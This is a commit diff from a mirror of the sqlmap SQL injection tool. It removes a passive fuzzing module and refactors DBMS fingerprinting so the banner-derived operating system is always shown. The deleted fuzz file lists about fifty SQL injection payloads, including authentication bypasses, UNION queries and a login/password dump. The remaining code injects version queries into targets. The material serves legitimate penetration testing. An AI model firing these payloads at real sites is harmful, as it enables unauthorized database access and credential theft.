mirror of
https://github.com/sqlmapproject/sqlmap.git
synced 2025-03-03 11:45:46 +03:00
Minor enhancement to show the DBMS operating system (if fingerprinted)
also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
This commit is contained in:
parent
7d7170fc97
commit
66fb3c3033
|
@ -1,43 +0,0 @@
|
|||
#!/usr/bin/env python
|
||||
|
||||
"""
|
||||
$Id$
|
||||
|
||||
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
|
||||
|
||||
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
|
||||
and Daniele Bellucci <daniele.bellucci@gmail.com>
|
||||
|
||||
sqlmap is free software; you can redistribute it and/or modify it under
|
||||
the terms of the GNU General Public License as published by the Free
|
||||
Software Foundation version 2 of the License.
|
||||
|
||||
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
|
||||
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||||
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||||
details.
|
||||
|
||||
You should have received a copy of the GNU General Public License along
|
||||
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
|
||||
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
|
||||
"""
|
||||
|
||||
|
||||
|
||||
from lib.core.agent import agent
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import paths
|
||||
from lib.request.connect import Connect as Request
|
||||
|
||||
|
||||
def passiveFuzzing():
|
||||
logMsg = "executing passive fuzzing to retrieve DBMS error messages"
|
||||
logger.info(logMsg)
|
||||
|
||||
fuzzVectors = open(paths.FUZZ_VECTORS, "r")
|
||||
|
||||
for fuzzVector in fuzzVectors:
|
||||
fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
|
||||
|
||||
payload = agent.payload(newValue=fuzzVector)
|
||||
Request.queryPage(payload)
|
|
@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper
|
|||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += actVer
|
||||
|
@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
formatInfo = None
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
if info:
|
||||
release = info["dbmsRelease"]
|
||||
version = info["dbmsVersion"]
|
||||
servicepack = info["dbmsServicePack"]
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if release and version and servicepack:
|
||||
banVer = "Microsoft SQL Server %s " % release
|
||||
|
@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
|
||||
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("@@VERSION")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
logger.info(logMsg)
|
||||
|
||||
randInt = str(randomInt(1))
|
||||
query = "LTRIM(STR(LEN(%s)))" % randInt
|
||||
query = "LTRIM(STR(LEN(%s)))" % randInt
|
||||
|
||||
if inject.getValue(query) == "1":
|
||||
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
|
||||
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
|
||||
version = inject.getValue(query)
|
||||
|
||||
if version == "8":
|
||||
|
@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
else:
|
||||
setDbms("Microsoft SQL Server")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("@@VERSION")
|
||||
|
||||
|
|
|
@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper
|
|||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
from lib.request.connect import Connect as Request
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
actVer = formatDBMSfp()
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += actVer
|
||||
|
@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
comVer = formatDBMSfp([comVer])
|
||||
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if info:
|
||||
# TODO: move to the XML banner file
|
||||
banVer = info['version']
|
||||
|
||||
if re.search("-log$", self.banner):
|
||||
banVer += ", logging enabled"
|
||||
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if int(kb.dbmsVersion[0]) >= 5:
|
||||
self.has_information_schema = True
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
setDbms("MySQL 5")
|
||||
self.has_information_schema = True
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
kb.dbmsVersion = [">= 5.0.0"]
|
||||
return True
|
||||
|
@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
setDbms("MySQL 4")
|
||||
kb.dbmsVersion = ["< 5.0.0"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
else:
|
||||
kb.dbmsVersion = ["< 3.22.11"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not MySQL"
|
||||
|
|
|
@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS
|
|||
from lib.core.unescaper import unescaper
|
||||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "Oracle"
|
||||
|
@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
formatInfo = None
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if info:
|
||||
banVer = info['version']
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if conf.dbms in ORACLE_ALIASES:
|
||||
setDbms("Oracle")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
setDbms("Oracle")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
elif re.search("^8", version):
|
||||
kb.dbmsVersion = ["8i"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not Oracle"
|
||||
|
|
|
@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS
|
|||
from lib.core.unescaper import unescaper
|
||||
from lib.parse.banner import bannerParser
|
||||
from lib.request import inject
|
||||
#from lib.utils.fuzzer import passiveFuzzing
|
||||
|
||||
from plugins.generic.enumeration import Enumeration
|
||||
from plugins.generic.filesystem import Filesystem
|
||||
|
@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
|
||||
def getFingerprint(self):
|
||||
value = "back-end DBMS: "
|
||||
value = ""
|
||||
info = None
|
||||
formatInfo = None
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if formatInfo:
|
||||
value += "%s\n" % formatInfo
|
||||
|
||||
value += "back-end DBMS: "
|
||||
|
||||
if not conf.extensiveFp:
|
||||
value += "PostgreSQL"
|
||||
|
@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
formatInfo = None
|
||||
value += "active fingerprint: %s" % actVer
|
||||
|
||||
if self.banner:
|
||||
info = bannerParser(self.banner)
|
||||
formatInfo = formatOSfp(info)
|
||||
|
||||
if info:
|
||||
banVer = info['version']
|
||||
banVer = formatDBMSfp([banVer])
|
||||
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
|
||||
|
||||
#passiveFuzzing()
|
||||
htmlErrorFp = getHtmlErrorFp()
|
||||
|
||||
if htmlErrorFp:
|
||||
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
|
||||
|
||||
if formatInfo:
|
||||
value += "\n%s" % formatInfo
|
||||
|
||||
return value
|
||||
|
||||
|
||||
|
@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
if conf.dbms in PGSQL_ALIASES:
|
||||
setDbms("PostgreSQL")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
|
||||
setDbms("PostgreSQL")
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
if not conf.extensiveFp:
|
||||
return True
|
||||
|
||||
|
@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
|
|||
else:
|
||||
kb.dbmsVersion = ["< 6.2.0"]
|
||||
|
||||
if conf.getBanner:
|
||||
self.banner = inject.getValue("VERSION()")
|
||||
|
||||
return True
|
||||
else:
|
||||
warnMsg = "the back-end DMBS is not PostgreSQL"
|
||||
|
|
|
@ -1,51 +0,0 @@
|
|||
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
|
||||
||6
|
||||
'||'6
|
||||
(||6)
|
||||
' OR 1=1--
|
||||
OR 1=1
|
||||
' OR '1'='1
|
||||
; OR '1'='1'
|
||||
%22+or+isnull%281%2F0%29+%2F*
|
||||
%27+OR+%277659%27%3D%277659
|
||||
%22+or+isnull%281%2F0%29+%2F*
|
||||
%27+--+
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or 1=1 /*
|
||||
or 1=1--
|
||||
' or 'a'='a
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
Admin' OR '
|
||||
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
|
||||
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
|
||||
' having 1=1--
|
||||
' having 1=1--
|
||||
' group by userid having 1=1--
|
||||
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
|
||||
' or 1 in (select @@version)--
|
||||
' union all select @@version--
|
||||
' OR 'unusual' = 'unusual'
|
||||
' OR 'something' = 'some'+'thing'
|
||||
' OR 'text' = N'text'
|
||||
' OR 'something' like 'some%'
|
||||
' OR 2 > 1
|
||||
' OR 'text' > 't'
|
||||
' OR 'whatever' in ('whatever')
|
||||
' OR 2 BETWEEN 1 and 3
|
||||
' or username like char(37);
|
||||
' union select * from users where login = char(114,111,111,116);
|
||||
' union select
|
||||
Password:*/=1--
|
||||
UNI/**/ON SEL/**/ECT
|
||||
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
|
||||
'; EXEC ('SEL' + 'ECT US' + 'ER')
|
||||
'/**/OR/**/1/**/=/**/1
|
||||
' or 1/*
|
||||
+or+isnull%281%2F0%29+%2F*
|
||||
%27+OR+%277659%27%3D%277659
|
||||
%22+or+isnull%281%2F0%29+%2F*
|
||||
%27+--+&password=
|
||||
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
|
||||
@var select @var as var into temp end --
|
|
@ -6,18 +6,34 @@
|
|||
<info type="Windows"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*7\.0">
|
||||
<info type="Windows" distrib="Vista"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*7\.0.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="Vista" sp="1"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*6\.0">
|
||||
<info type="Windows" distrib="2003"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*6\.0.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="2003" sp="1"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.1">
|
||||
<info type="Windows" distrib="XP"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.1.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="XP" sp="1"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.0">
|
||||
<info type="Windows" distrib="2000"/>
|
||||
</regexp>
|
||||
|
||||
<regexp value="Microsoft.*5\.0.*Service Pack (\d)">
|
||||
<info type="Windows" distrib="2000" sp="1"/>
|
||||
</regexp>
|
||||
|
|
Loading…
Reference in New Issue
Block a user